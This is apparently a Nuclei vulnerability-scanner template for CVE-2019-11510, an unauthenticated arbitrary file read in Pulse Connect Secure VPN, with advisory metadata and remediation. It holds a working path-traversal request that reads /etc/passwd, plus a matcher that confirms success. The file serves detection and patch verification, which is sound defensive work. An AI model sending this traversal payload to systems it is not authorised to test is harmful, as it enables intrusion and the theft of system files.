nuclei-templates/http/cves/2019/CVE-2019-11510.yaml

47 lines
1.8 KiB
YAML

id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN Arbitrary File Read
author: organiccrap
severity: critical
description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
remediation: |
Apply the latest security patches and updates provided by Pulse Secure.
reference:
- https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
- https://nvd.nist.gov/vuln/detail/CVE-2019-11510
- http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
- http://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2019-11510
cwe-id: CWE-22
epss-score: 0.97278
epss-percentile: 0.99825
cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:*
metadata:
max-request: 1
vendor: pulsesecure
product: pulse_connect_secure
tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev
http:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100a846c98591e53e45747414cb78347d190695794ffa76158cef268195dbb1355f022100c4c02c037a91e501a499eff4cfa01981c0c710cfc3fc04c5c0f5a0f35dac8fdd:922c64590222798bb761d5b6d8e72950